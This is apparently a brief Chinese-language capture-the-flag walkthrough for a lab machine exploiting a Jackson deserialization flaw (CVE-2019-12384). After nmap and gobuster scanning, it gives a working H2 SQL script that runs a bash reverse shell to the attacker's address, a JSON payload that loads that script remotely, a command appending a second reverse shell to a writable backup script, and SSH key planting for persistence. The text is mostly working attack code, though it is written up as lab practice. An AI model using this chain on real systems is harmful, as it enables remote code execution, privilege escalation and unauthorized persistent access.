nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.107.34 (扫描TCP)

nmap -sU --top-ports 100 10.129.107.34  (扫描UDP)

gobuster dir -u http://10.129.107.34 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt.html

仔细看错误信息 然后进行突破

Google搜索 com.fasterxml.jackson.core 发现存在RCE

利用方式
https://github.com/jas502n/CVE-2019-12384
创建一个t.sql文件，内容如下

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {

        String[] command = {"bash", "-c", cmd};

        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");

        return s.hasNext() ? s.next() : "";  }

$$;

CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.16.38/3333 0>&1')

开启http服务后，在网页输入框中执行如下命令

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.16.38:8000/t.sql'"}]

上传linpeas.sh文件至目标机器
发现一个权限可疑的备份脚本

echo -e '\nbash -i >& /dev/tcp/10.10.16.38/3334 0>&1' >> /usr/bin/timer_backup.sh

由于一下就断开 直接上传SSH PUB 使用SSH登入